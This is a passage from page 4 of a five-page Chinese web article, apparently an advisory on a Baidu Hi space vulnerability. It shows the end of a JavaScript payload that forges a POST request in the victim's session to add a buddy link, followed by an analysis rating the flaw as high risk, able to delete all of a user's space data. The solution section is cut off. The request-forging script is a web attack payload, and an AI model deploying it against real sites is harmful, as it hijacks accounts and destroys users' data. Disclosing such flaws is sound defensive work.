;desc=’%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB’;
var url=’/’+user+’/commit’;
var data=’ct=6&cm=1&spRef=’+escape(’http://hi.baidu.com/’+user)+’%2Fmodify%2Fbuddylink%2F0&spBuddyName=’+escape(name)+’&spBuddyURL=’+escape(link)+’&spBuddyIntro=’+escape(desc);
req.open(’post’,url,false);
req.send(data);
}
}
}
分析:
该方法危险等级:高级.构造相应的js代码可以删除用户空间的所有数据.该漏洞目前未发现有恶意删除的现象,但已足够危险,请用户小心.
解决办法:<页码:[1] [2] [3] [4] [5] 第4页、共5页 |
